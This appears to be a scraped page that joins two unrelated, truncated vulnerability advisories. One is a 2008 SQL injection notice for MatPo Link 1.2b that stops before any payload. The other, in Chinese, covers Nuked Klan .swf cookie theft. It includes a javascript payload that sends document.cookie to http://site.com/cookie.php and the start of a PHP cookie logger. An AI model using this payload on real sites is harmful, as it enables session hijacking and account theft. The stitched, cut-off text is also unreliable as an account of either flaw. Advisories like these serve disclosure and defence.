MatPo Link 1.2b - SQL Injection

MatPo Link 1.2b - SQL Injection MatPo Link Version 1.2 Beta Remote Sql inj. view.php id ---------------------------------------------------------- Discovered By: ZoRLu Date: 03.11.2008 Home: www.z0rlu.blogspot.com contact: [email protected] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : N0T:...

Nuked Klan任意.SWF文件COOKIE窃取漏洞

Nuked Klan是一款基于ASP的WEB应用程序。 Nuked Klan处理.swf文件存在问题，远程攻击者可以利用漏洞获取其他目标用户的敏感COOKIE信息。 构建一个.swf文件，放置如下代码： getURL"javascript:alert'document.location="http://site.com/cookie.php? cookie="+document.cookie';"; 或者 ?php $cookie = $GET'cookie'; $ip = getenv 'REMOTEADDR'; $date=date"m/d/Y g:i:s a";...